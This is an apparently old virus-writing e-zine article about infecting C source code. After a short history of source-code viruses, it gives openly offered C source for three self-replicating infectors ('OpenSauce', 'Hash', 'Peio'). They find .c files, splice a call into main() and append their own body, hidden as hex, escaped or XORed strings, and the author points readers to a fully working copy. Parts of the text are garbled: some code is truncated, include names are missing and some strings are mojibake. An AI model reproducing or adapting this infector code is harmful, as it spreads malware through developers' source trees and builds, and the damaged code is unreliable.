Join us now and share the malware...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Reflections about the Open Source and Free Software community and its blind belief in the goodness of the source code.

by zert

0.- Abstract
1.- Introduction
2.- Precedents
  2.1.- DOS viruses, Urphin
  2.2.- 1994, SrcVir virus family and Die-Hard virus
  2.3.- Compiler libraries' infectors
  2.4.- Any scripting language virus code
3.- Why try to infect source code?
4.- OK, but... how?
  4.1.- Typical scenario
  4.2.- ASM inline approach
  4.3.- "Quine" approach
  4.4.- Future developments
5.- Conclusions
6.- Related links

0.- Abstract

In this article we'll talk about the possibilities of infecting source code files, the precedents that exist on this subject and the developments that could come in the future. The text is accompanied by examples in C, as "proofs of concept" of the details explained. Other ways of developing viruses for source code are also presented, from a less practical point of view, outlining the main steps of their programming.

1.- Introduction

As the famous Free Software Foundation song [1] says, nowadays a lot of people are joining the Free Software movement or its (more commercial) variants such as the Open Source movement. The title of this article is a wink at the song's chorus ("Join us now and share the software, you'll be free, hackers, you'll be free..."): the distribution capacity that source code has gained in these environments could also be used to hand out viral code.

Many of us are developing an almost blind faith in the developers of open source programs: because the code is visible, we assume it will be much harder to be cheated and that the chance of unwanted effects being slipped into these programs is reduced.
If we think about it, when we go to a magic show, many of the tricks need a curtain, a wall or something else to hide how we are being fooled. But many other tricks are performed right in front of our faces, using nothing but the hands, and even so we fall for them. Something similar could happen with open source programs: the code is there and everybody can read and examine it, yet very few actually do (who has audited the *whole* code running on their box?). Besides, code can sometimes be obfuscated until it is very hard to understand, which makes it possible to insert hidden elements that the user of that code does not want.

Source code viruses have never been a real threat, basically because, until recently, exchanging programs as source code was very unusual outside a very geeky environment. Viruses have had their natural habitat in executable programs, typically binaries, passed from hand to hand all these years. Although P2P networks have relaunched the massive exchange of binaries, that approach seems to be in gradual decline, and what rules right now is the virus + worm approach, using workstations or servers as infection vectors.

Nowadays, exchanging programs as source code is no longer just for computer freaks. In the world of Free Software and Open Source, it is the most common way to distribute code. Usually the code is audited at least by its own author, although there are a lot of myths about this. Even so, there have been cases in which the official FTP server was cracked and the original source code was altered [3] [4]. On those occasions the inserted code was very obvious, but a subtler attack could have been attempted.
I don't know whether in the future P2P networks will be full of tarballs with the source code of many programs, or whether auditing source code will become a task that can be automated (which would open a new battlefield between auditors and malware writers). What can be verified is that right now the exchange of source code is increasing, and so it is worth analysing how suitable it is as an infection vector.

2.- Precedents

Up to now, only a few timid infectors have been developed with source code as their target. The reason is simple: source code was not a good infection method until the "open source revolution" burst onto the current scene.

2.1.- DOS viruses, Urphin

In the distant past of DOS viruses, the Urphin virus [5] already thought of infecting source code as a way to spread. Its behaviour was not strange at all: once executed, it stayed resident (service 31h of int 21h), waiting for the program TPC.EXE (Turbo Pascal Compiler) to run, and at that moment it intercepted the .PAS files, which contain the source code of Pascal programs. Once it had found a .PAS file, it looked for the word "BEGIN", which marks the start of a code block in Pascal, and added a hexadecimal dump of its own code to be executed together with the Pascal code. When the file was closed, the virus removed the source code it had just inserted, so that the infected source file was left clean after the executable binary had been generated.

2.2.- 1994, SrcVir virus family and Die-Hard virus

Many web pages that explain the history of computer viruses [6] mention the SrcVir family. It appeared in 1994 together with a wave of new viruses whose targets and behaviours were unusual for the time. The aim of this family was mainly to infect source code files written in C and Pascal, in a way similar to the Urphin virus mentioned above.
The same year another virus that infected source code was written and released: the Die-Hard virus [7]. It is a fairly standard virus (a COM and EXE infector for DOS) except for one feature: it looks for .ASM and .PAS files, assembly and Pascal source code respectively, and adds a dump of its code to them.

2.3.- Compiler libraries' infectors

Some viruses target OBJ and LIB files [8], adding their code to modules or libraries that will later be linked into executables. Files infected this way act just as "carriers", waiting for an executable to be linked against them so that the virus can go on spreading. The resulting executables do not infect other executables themselves, so there is no risk of self-infection and the virus code does not need to check for it. The infected files are useless until their code is included in an executable, and remain "latent" until that happens.

2.4.- Any scripting language virus code

Obviously, any virus written in a scripting language that targets other scripts is an infector that copies its own source code into the host file. There are several approaches to this kind of virus in Perl or shell scripts [9] [10], and countless Internet worms written in Visual Basic Script and other scripting languages.

3.- Why try to infect source code?

As mentioned before, this may well be an expanding field, and several factors point that way:

* The increasing interest in operating systems such as GNU/Linux and *BSD creates a community of users whose main value is the source code, which is used as currency. Some of these new users are far from the original idea of a UNIX hacker and are becoming less technical (using the computer as a rather modern washing machine).
* The growing interest of governments and public bodies in using open source software to increase their security. Open source is not inherently more secure than closed source software if the appropriate measures are not taken. There are a lot of myths about this [2], apart from the many attempts by Microsoft to deceive the consumer with half-truths [13].

* Some programs have to be compiled on each computer separately, either because they are free software that links against proprietary libraries or codecs, or because there can be an enormous difference between the generic i386 build and one compiled for the specific machine. This requires a development environment on more computers. The paradigmatic example is the MPlayer multimedia player.

4.- OK, but... how?

4.1.- Typical scenario

Bob is a young sysadmin fascinated by wireless networks. His knowledge of computer networks is advanced, but he has no idea about programming beyond a few simple shell scripts. On a very enjoyable wardriving evening, while he and his friend Dave are listening to Massive Attack and poking around the routers of a local company, Bob is astonished by the great program Dave uses to scan wireless networks. Eager, he asks for the URL and downloads it without further delay:

  wget http://packetstormsecurify.nl/sniffers/wireless/wlanthrax-0.6.9.tar.gz
  tar xzf wlanthrax-0.6.9.tar.gz
  cd wlanthrax-0.6.9
  ./configure
  make
  make install

(advisory: http://packetstormsecurify.nl doesn't exist, but it could be bought at a reasonable price. Any resemblance to coincidence is the plain truth)

Yeah! The program works and the networks are surrendering like scared rats. Tons of adrenaline, just like in the old times! What poor Bob doesn't know is that the tarball contained malware, and now it is running through the digital veins of his laptop. The same thing had happened to Bob before, and since then he never does this as the root user.
Obviously, the "make install" command would never work as a normal user, but the tool would still be executable and usable. Clever boy, but even from a normal user account we could try to infect all the source code reachable with those privileges, which can be enough.

Do you think this situation is improbable? How many times have we done tar xzf && ./configure && make && make install blindly? I admit that I have sometimes installed software that way O;-D

4.2.- ASM inline approach

Every virus coder knows reverse engineering tools that produce high quality disassemblies. Names like the IDA disassembler, or even the disassembly view of HIEW (Hacker's View), quickly come to mind. BIEW, the UNIX port of HIEW (really its "little brother"), also supports the disassembly view, so we can easily see the assembler source of any program.

An ASM inline approach to infecting source files would have to implement a small disassembler for its own code, in order to include that code in the source file. If we take as a reference the C source code used in GNU/Linux, we would need a disassembler that emits our code in AT&T syntax, and then include that code in a function:

  int virus() {
    __asm__(
      "pusha\n\t"
      "call 0x8048086\n\t"
      [...]
      "mov $0x1,%%eax\n\t"
      "int $0x80"
    );
  }

To obtain that disassembly we can apply the Free Software philosophy and take the code that does this job from tools like BIEW or objdump. The main problem with doing it that way is that the disassembler would take up a very large part of our virus code, so we can discard the idea and try to call those tools directly: if our aim is to infect source code, we can assume that the infected computer is a development workstation that may have those tools installed. Using the "execve" syscall in UNIX we could execute one of them and generate the listing in a child process. An optimised version of this approach would first check which of the most common tools able to do the job are present.
Pros:

* We don't need to think too much: everything is already done, we only have to join the pieces ;-)
* We are still programming in assembler, controlling each detail.

Cons:

* It is not exactly "discreet".
* Being assembler, we lose the inherent multiplatform nature of most source code.
* The disassembly process can sometimes be too troublesome.

4.3.- "Quine" approach

A "quine" is a program that generates its own source code *without* reading its own code. There have even been international programming contests for these peculiar proggies, all of them in an extremely freaky atmosphere. There are several ways to write quines, some very complicated and others very elegant, but the most functional form, in my humble opinion, uses arrays of chars. In fact, I was very surprised after writing my first quine: when I looked at the others, many were very different, but the one Ken Thompson wrote was practically identical, although a little less complicated. The main idea is to keep the source code in an array of chars so as to be able to do the following:

  printf("char array[] = \"%s\";", array);

With that approach we break the vicious circle that quines pose when you want to print out your own code (doing printf("printf(\"printf(\"... does not seem to be a good approach ;-D).

Some time later I discovered an authentic jewel of computer science [11] when I saw the problem Thompson posed in his famous talk "Reflections on Trusting Trust", given when he received the ACM Turing Award. It is amazing to understand the implications of that text, and surprising to see an authentic guru like Ken Thompson speaking like a malware coder };-) For the moment, the issue he explained has no clear solution and seems to be a headache with no simple way out [12].

Well, if we focus on this main point, we can see that an array of chars containing the code of the program is necessary. This is where the greatest differences can arise.
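The array trick described above can be looked at in isolation. The following is only a sketch of that one step, not a complete quine and not anything taken from the original code: the names tmpl and render_self are made up for illustration, and quote and newline characters are passed as the numeric codes 34 and 10 so that the template needs no escape sequences.

```c
#include <stdio.h>

/*
 * Hypothetical template (not from the article): one declaration line
 * and one statement. %c placeholders stand for '"' (34) and '\n' (10),
 * %s stands for the template text itself.
 */
static const char tmpl[] =
    "char s[] = %c%s%c;%cprintf(s, 34, s, 34, 10, 10);%c";

/*
 * Render the template through itself into out.
 * Returns the number of characters that the full text needs,
 * as reported by snprintf().
 */
int render_self(char *out, size_t cap)
{
    return snprintf(out, cap, tmpl, 34, tmpl, 34, 10, 10);
}
```

Calling render_self(buf, sizeof buf) leaves two lines in buf: the declaration of s with the template inside the quotes, and the printf statement. Placed inside a main(), those two lines would print themselves again, which is the self-reference that a full quine extends to the whole file.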
Thompson created his array char by char, in the following form:

  char s[] = {
    '\t', '0', '\n', '}', ';', '\n', '\n',
    'm', 'a', 'i', 'n', '(', ')', '\n',
    ...
    0
  };

In my initial approach I felt that this, in addition to being quite strange, was too obvious: it is clear at a glance that the content of the array is C source code. Because of that, I used another notation to store each char in a less obvious way:

  char s[] = {
    0x6D, 0x61, 0x69, 0x6E, 0x28, 0x29, 0x20, 0x7B,
    0x0D, 0x0A, 0x69, 0x6E, 0x74, 0x20, 0x69, 0x3B,
    0x0D, 0x0A, 0x09, 0x70, 0x72, 0x69, 0x6E, 0x74,
    0x66, 0x28, 0x22, 0x63, 0x68, 0x61, 0x72, 0x20,
    ...
    0
  };

The immediate goal was met: to the eyes of somebody not very familiar with the ASCII table, this does not look like C source code. Nevertheless, this way of defining the array increased the size of the code too much, so a way to reduce it was needed. The first thing I thought of was to double the space used in the executable but halve the space used in the source code, with an array like this one:

  char s[] = "6D61696E2829207B0D0A69...";

Done this way, the array takes up much less space in the C source code. The bad news is that I now use 2 bytes to represent each char within my array (damn!!).
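Reading such a string back means turning every pair of hex digits into one byte again. The following is a minimal sketch of that conversion, under the assumption that the string holds only hex digits. The helper names hex_value and hex_decode are illustrative and do not come from the original code.

```c
#include <stddef.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_value(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Decode the hex string `hex` into `out`, which holds `cap` bytes.
 * The result is NUL-terminated. Returns the number of decoded bytes,
 * or -1 on odd length, invalid digit or insufficient space.
 */
long hex_decode(const char *hex, char *out, size_t cap)
{
    size_t len = strlen(hex);

    if (len % 2 != 0 || len / 2 + 1 > cap)
        return -1;

    for (size_t i = 0; i < len; i += 2) {
        int hi = hex_value(hex[i]);      /* high nibble */
        int lo = hex_value(hex[i + 1]);  /* low nibble  */
        if (hi < 0 || lo < 0)
            return -1;
        out[i / 2] = (char)((hi << 4) | lo);
    }
    out[len / 2] = '\0';
    return (long)(len / 2);
}
```

For instance, decoding the first sixteen digits of the array shown above, "6D61696E2829207B", yields the eight characters of "main() {".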
We cannot use printf() to print that array in the host code, we must do something similar to this: int i; char nibblechar, nibble[2]; for(i=0;i <-opensauce.c---------------------------------------------------------------> <---------------------------------------------------------------------------> /* * OpenSauce * * A trial to infect source code * zert * */ #include #include #include #include #include #include #include #include #include #include void virus(); int main(int argc, char *argv[]) { virus(); } void virus() { int i, hd, fd, readbyte, writebyte, posmain, posbuffer; DIR *dd; struct dirent *dirp; char nibble[2], nibblechar, *readbuffer, *writebuffer, *readmain, *writemain, *bufname, *buffer; char charinclude[] = "23696e636c756465203c737464696f2e683e0a23696e636c756465203c7374646c69622e683e0a23696e636c756465203c7379732f737461742e683e0a23696e636c756465203c756e697374642e683e0a23696e636c756465203c66636e746c2e683e0a23696e636c756465203c74696d652e683e0a23696e636c756465203c646972656e742e683e0a23696e636c756465203c656c662e683e0a23696e636c756465203c7379732f74797065732e683e0a23696e636c756465203c7379732f776169742e683e0a0a766f696420766972757328293b0a0a"; char charvirus[] = "0a766f69642076697275732829207b0a2020696e7420692c2068642c2066642c2072656164627974652c207772697465627974652c20706f736d61696e2c20706f736275666665723b0a2020444952202a64643b0a202073747275637420646972656e74202a646972703b0a202063686172206e6962626c655b325d2c206e6962626c65636861722c202a726561646275666665722c202a77726974656275666665722c200a202020202020202a726561646d61696e2c202a77726974656d61696e2c202a6275666e616d652c202a6275666665723b0a"; char charvirusend[] = "0a20206464203d206f70656e64697228222e22293b0a20207768696c65282864697270203d207265616464697228646429293e3029200a202020206966282868643d6f70656e28646972702d3e645f6e616d652c204f5f524457522c203029293e3d3029207b0a ... 
"; /* scan for hosts in current dir */ dd = opendir("."); while((dirp = readdir(dd))>0) if((fd=open(dirp->d_name, O_RDWR, 0))>=0) { /* is a C source file? */ if(!(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".c"))|| !(strcmp(dirp->d_name+strlen(dirp->d_name)-2,".C"))) { /* searching infection mark... */ lseek(fd, -30, SEEK_END); bufname = (char *)malloc(30); readbyte = read(fd, bufname,30); if((strstr(bufname, "/* sauce! */")<=0)) { /* infection mark not found */ /* searching main() function... */ lseek(fd, 0, SEEK_SET); posmain = posbuffer = 0; buffer = (char *)malloc(1024); while((readbyte=read(fd,buffer,1024))>0) { if( ((posbuffer=(int)strstr(buffer,"\nmain("))>0) || ((posbuffer=(int)strstr(buffer,"\nint main("))>0) || ((posbuffer=(int)strstr(buffer,"\nvoid main("))>0) || ((posbuffer=(int)strstr(buffer,"\nmain ("))>0) || ((posbuffer=(int)strstr(buffer,"\nint main ("))>0) || ((posbuffer=(int)strstr(buffer,"\nvoid main ("))>0) ) { break; } posmain += readbyte; } if(posbuffer>0) { posmain += ((int)posbuffer-(int)buffer); lseek(fd, posmain, SEEK_SET); read(fd, buffer, 80); if((posbuffer = (int)strstr(buffer,"{\n"))>0) posmain += 2 + ((int)posbuffer-(int)buffer); else posmain = -1; } else posmain = -1; if(posmain>0) { /* let's infect! 
*/ lseek(fd, 0, SEEK_SET); writebyte = strlen(charinclude) / 2; readbuffer = (char *)malloc(writebyte); writebuffer = (char *)malloc(writebyte); writebuffer = (char *)malloc(writebyte); for(i=0;i0) { lseek(fd, -readbyte, SEEK_CUR); write(fd, writebuffer, writebyte); writebyte = read(fd, writebuffer, writebyte); lseek(fd, -writebyte, SEEK_CUR); write(fd, readbuffer, readbyte); } lseek(fd,-readbyte,SEEK_CUR); write(fd,writebuffer,writebyte); /* call virus from main() */ writebyte = strlen(charinclude) / 2; lseek(fd, posmain+writebyte, SEEK_SET); writebyte = strlen("\n virus();\n"); readmain = (char *)malloc(writebyte); writemain = (char *)malloc(writebyte); strcpy(writemain,"\n virus();\n"); while((readbyte=read(fd,readmain,writebyte))>0) { lseek(fd,-readbyte,SEEK_CUR); write(fd,writemain,writebyte); writebyte=read(fd,writemain,writebyte); lseek(fd,-writebyte,SEEK_CUR); write(fd,readmain,readbyte); } lseek(fd,-readbyte,SEEK_CUR); write(fd,writemain,writebyte); /* copy virus function at EOF */ lseek(fd, 0, SEEK_END); for(i=0;i <-end of opensauce.c--------------------------------------------------------> <---------------------------------------------------------------------------> The code is not a jewel of the programming science, but it's useful to show what it wanted and in addition works (more or less). In the "charvirusend" array many lines have been suppressed not to fatten unnecessarily this text (if you want a functional version of the code, look for it in 29a #7 e-zine). The rest of code is quite trivial: 1) Search files in the current directory: open the directory with opendir(), read each one of its entries with readdir() and close it with closedir(). 2) Once we have a possible victim, we verify thus if is a ".c" or ".C" file, and if it has been already infected (if contains "/* sauce * /" infection mark) and if it is a C source file with a main() function. 
3) If all the specified in the previous point has been fulfilled, we come to infect, copying the includes and the declaration of the virus() function in the beginning (charinclude), adding a call to this function within main(), and generating at the end of the code the virus() function virus() (using "charvirus" and "charvirusend" in addition to a few calls to write() to define arrays). 4) Once finished the infection, we close the file and the directory, because we just infect one file each time. 5) virus() function ends and we return to the original code, and everything works as it would have to work. Let's see another example of this type of virus, something more evolved: <---------------------------------------------------------------------------> <-hash.c--------------------------------------------------------------------> <---------------------------------------------------------------------------> /* * Hash, * * quine-based source code infector. * zert * */ #include #include #include #include #include #include void init_hash(); int main(int argc, char *argv[]) { init_hash(); } void init_hash() { int i, j, fd, size, mpos, ipos, page, ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; void *ptr; char hashinc[] = "\n#include \n#include \n#include \n#include \n#include \n#include \n\nvoid init_hash();\n"; char hashbeg[] = "\nvoid init_hash()\n{\n\tint i, j, fd, size, mpos, ipos, page, \n\tihole, thole, bhole, ehole; struct dirent *dir; DIR *d;\n\tvoid *ptr;\n\tchar hashinc[] = \""; char hashend[] = "\tchar *buf;\n\n\td = opendir(\".\");\n\twhile((dir = readdir(d))>0)\n\t\tif(!(strcmp(dir->d_name+strlen(dir->d_name)-2,\".c\"))||\n\t\t !(strcmp(dir->d_name+strlen(dir->d_name)-2,\".C\"))) \n\t\t\tif((fd=open(dir->d_name, O_RDWR, 0))>=0)\n\t\t\t{\n\t\t\t\tsize = lseek(fd, 0, SEEK_END);\n\t\t\t\tptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0);\n\t\t\t\tif( (!strstr(ptr,\"init_hash\")) &&\n\t\t\t\t ( ((mpos=(int)strstr(ptr,\"\\nmain(\"))>0) ||\n\t\t\t\t 
((mpos=(int)strstr(ptr,\"\\nint main(\"))>0) ||\n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nvoid main(\"))>0) || \n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nmain (\"))>0) ||\n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nint main (\"))>0) ||\n\t\t\t\t ((mpos=(int)strstr(ptr,\"\\nvoid main (\"))>0) ) )\n\t\t\t\t{\n\t\t\t\t\tmpos = (int)strstr((void *)mpos, \";\\n\");\n\t\t\t\t\tmpos -= (int)--ptr;\n\t\t\t\t\tif( !(ipos = (int)strstr(++ptr, \"#include <\")) )\n\t\t\t\t\t{\n\t\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t\tmunmap(ptr, size);\n\t\t\t\t\tpage = 3 * (int)sysconf(_SC_PAGESIZE);\n\t\t\t\t\tftruncate(fd, size+page);\n\t\t\t\t\tptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0);\n\t\t\t\t\tipos = (int)strstr(ptr, \"#include <\");\n\t\t\t\t\tipos = (int)strstr((void *)ipos, \"\\n\\n\");\n\t\t\t\t\tipos -= (int)ptr;\n\t\t\t\t\tihole = strlen(hashinc);\n\t\t\t\t\tfor(i=(size-ipos)/ihole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole);\n\t\t\t\t\tmemcpy(ptr+ipos, hashinc, ihole);\n\t\t\t\t\tmpos += ihole;\n\t\t\t\t\tbuf = (char *)malloc(20*sizeof(char));\n\t\t\t\t\tstrcpy(buf,\"\\n\\tinit_hash();\");\n\t\t\t\t\tthole = strlen(buf);\n\t\t\t\t\tfor(i=(size+ihole-mpos)/thole;i>=0;i--) \n\t\t\t\t\t\tmemcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole);\n\t\t\t\t\tmemcpy(ptr+mpos, buf, thole);\n\t\t\t\t\tbhole = strlen(hashbeg);\n\t\t\t\t\tmemcpy(ptr+size+ihole+thole, hashbeg, bhole);\n\t\t\t\t\tbuf = (char *)malloc(100*sizeof(char)+strlen(hashinc));\n\t\t\t\t\tfor(i=0,j=0;i0) if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C"))) if((fd=open(dir->d_name, O_RDWR, 0))>=0) { size = lseek(fd, 0, SEEK_END); ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); if( (!strstr(ptr,"init_hash")) && ( ((mpos=(int)strstr(ptr,"\nmain("))>0) || ((mpos=(int)strstr(ptr,"\nint main("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main("))>0) || ((mpos=(int)strstr(ptr,"\nmain ("))>0) || 
((mpos=(int)strstr(ptr,"\nint main ("))>0) || ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) { mpos = (int)strstr((void *)mpos, ";\n"); mpos -= (int)--ptr; if( !(ipos = (int)strstr(++ptr, "#include <")) ) { munmap(ptr, size); break; } munmap(ptr, size); page = 3 * (int)sysconf(_SC_PAGESIZE); ftruncate(fd, size+page); ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); ipos = (int)strstr(ptr, "#include <"); ipos = (int)strstr((void *)ipos, "\n\n"); ipos -= (int)ptr; ihole = strlen(hashinc); for(i=(size-ipos)/ihole;i>=0;i--) memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); memcpy(ptr+ipos, hashinc, ihole); mpos += ihole; buf = (char *)malloc(20*sizeof(char)); strcpy(buf,"\n\tinit_hash();"); thole = strlen(buf); for(i=(size+ihole-mpos)/thole;i>=0;i--) memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); memcpy(ptr+mpos, buf, thole); bhole = strlen(hashbeg); memcpy(ptr+size+ihole+thole, hashbeg, bhole); /* declaracion de arrays y arrays */ buf = (char *)malloc(100*sizeof(char)+strlen(hashinc)); for(i=0,j=0;i <-end of hash.c-------------------------------------------------------------> <---------------------------------------------------------------------------> In this example, hashes are in plain text and correspond to necessary format strings to generate each code lines for the infection. In spite of their size, hashes will occupy less enough within the executable program, because all the escape characters will be reduced to one byte each. As a counterpart, we will have to introduce the necessary code to regenerate both chars that specify each escape character solely (translating just '\t', '\n', '\\' and '\"'). All the remaining code are byte copies within the memory address where the file resides, by using memcpy(). The use of mmap() and memcpy() instead of open(), write() and lseek() speeds up the modification of files enormously. 
Finally, the "Peio" infector uses the same techniques that "Hash", but in this case hashes are XORed, reason why escape characters like '\t' or '\n' can be used without having to indicate it specifically. This way, the size of the hash array is reduced considerably, in addition to not needing the code that translates to two bytes each escape character. <---------------------------------------------------------------------------> <-peio.c--------------------------------------------------------------------> <---------------------------------------------------------------------------> /* * Peio, * * source code infector XORing hashes. * zert * */ #include #include #include #include #include #include void init_hash(); int main(int argc, char *argv[]) { init_hash(); } void init_hash() { int i, j, fd, size, mpos, ipos, page, ihole, thole, bhole, ehole; struct dirent *dir; DIR *d; void *ptr; char hashinc[] = "Š£éîãìõäå 1/4óôäéï(r)è3/4Š£éîãìõäå 1/4óùó¯óôáô(r)è3/4Š£éîãìõäå 1/4óùó¯ííáî(r)è3/4Š£éîãìõäå 1/4õîéóôä(r)è3/4Š£éîãìõäå 1/4äéòåîô(r)è3/4Š£éîãìõäå 1/4æãîôì(r)è3/4ŠŠöïéä éîéôßèáóè¨(c)" Š"; char hashbeg[] = "Šöïéä éîéôßèáóè¨(c)ŠûŠ‰éîô é¬ ê¬ æä¬ óéúå¬ íðïó¬ éðïó¬ ðáçå¬ Š‰éèïìå¬ ôèïìå¬ âèïìå¬ åèïìå" óôòõãô äéòåîô ªäéò" ÄÉÒ ªä"Š‰öïéä ªðôò"Š‰ãèáò èáóèéîãÛÝ 1/2 ¢"; char hashend[] = "‰ãèáò ªâõæ"ŠŠ‰ä 1/2 ïðåîäéò¨¢(r)¢(c)"Š‰÷èéì娨äéò 1/2 òåáääéò¨ä(c)(c)3/4°(c)Š‰‰é模¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)ã¢(c)(c)üüŠ‰‰ ¡¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)â(c)(c)(c) Š‰‰‰é樨æä1/2ïðåî¨äéò­3/4äßîáíå¬ ÏßÒÄ×Ò¬ °(c)(c)3/41/2°(c)Š‰‰‰ûŠ‰‰‰‰óéúå 1/2 ìóååë¨æä¬ °¬ ÓÅÅËßÅÎÄ(c)"Š‰‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå¬ÐÒÏÔßÒÅÁĬÍÁÐßÐÒÉÖÁÔŬæ䬰(c)"Š‰‰‰‰éæ¨ ¨¡óôòóôò¨ðôò¬¢éîéôßèáóè¢(c)(c) ¦¦Š‰‰‰‰ ¨ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáé(c)(c)3/4°(c) üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáé(c)(c)3/4°(c) üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáé(c)(c)3/4°(c) üü Š‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáéî ¨¢(c)(c)3/4°(c) üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáéî ¨¢(c)(c)3/4°(c) 
üüŠ‰‰‰‰ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáéî ¨¢(c)(c)3/4°(c) (c) (c)Š‰‰‰‰ûŠ‰‰‰‰‰íðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)íðïó¬ ¢"Üî¢(c)"Š‰‰‰‰‰íðïó ­1/2 ¨éîô(c)­­ðôò"Š‰‰‰‰‰éæ¨ ¡¨éðïó 1/2 ¨éîô(c)óôòóôò¨""ðôò¬ ¢£éîãìõäå 1/4¢(c)(c) (c)Š‰‰‰‰‰ûŠ‰‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Š‰‰‰‰‰‰âòåáë"Š‰‰‰‰‰ýŠ‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Š‰‰‰‰‰ðáçå 1/2 ³ ª ¨éîô(c)óùóãïîæ¨ßÓÃßÐÁÇÅÓÉÚÅ(c)"Š‰‰‰‰‰æôòõîãáôå¨æä¬ óéúå"ðáçå(c)"Š‰‰‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå"ðáçå¬ÐÒÏÔßÒÅÁÄ"ÐÒÏÔß×ÒÉÔŬÍÁÐßÓÈÁÒÅĬæ䬰(c)"Š‰‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨ðôò¬ ¢£éîãìõäå 1/4¢(c)"Š‰‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)éðïó¬ ¢ÜîÜî¢(c)"Š‰‰‰‰‰éðïó ­1/2 ¨éîô(c)ðôò"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Š‰‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Š‰‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰éèïìå 1/2 óôòìåî¨èáóèéîã(c)"Š‰‰‰‰‰æïò¨é1/2¨óéúå­éðïó(c)¯éèïìå"é3/41/2°"é­­(c) Š‰‰‰‰‰‰íåíãðù¨ðôò"éðïó"éªéèïìå"éèïìå¬ ðôò"éðïó"éªéèïìå¬ éèïìå(c)"Š‰‰‰‰‰íåíãðù¨ðôò"éðïó¬ èáóèéî㬠éèïìå(c)"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Š‰‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰íðïó "1/2 éèïìå"Š‰‰‰‰‰âõæ 1/2 ¨ãèáò ª(c)íáììï㨲°ªóéúåïæ¨ãèáò(c)(c)"Š‰‰‰‰‰óôòãðù¨âõ欢ÜîÜôéîéôßèáóè¨(c)"¢(c)"Š‰‰‰‰‰ôèïìå 1/2 óôòìåî¨âõæ(c)"Š‰‰‰‰‰æïò¨é1/2¨óéúå"éèïìå­íðïó(c)¯ôèïìå"é3/41/2°"é­­(c) Š‰‰‰‰‰‰íåíãðù¨ðôò"íðïó"éªôèïìå"ôèïìå¬ ðôò"íðïó"éªôèïìå¬ ôèïìå(c)"Š‰‰‰‰‰íåíãðù¨ðôò"íðïó¬ âõæ¬ ôèïìå(c)"Š‰‰‰‰‰âèïìå 1/2 óôòìåî¨èáóèâåç(c)"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå¬ èáóèâåç¬ âèïìå(c)"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèéî㬠éèïìå(c)"Š‰‰‰‰‰âèïìå "1/2 éèïìå"Š‰‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèâåçÛÝ 1/2 Ü¢¢(c)"Š‰‰‰‰‰âèïìå "1/2 ²²"Š‰‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Š‰‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Š‰‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèâåç¬ óôòìåî¨èáóèâåç(c)(c)"Š‰‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèâåç(c)"Š‰‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ 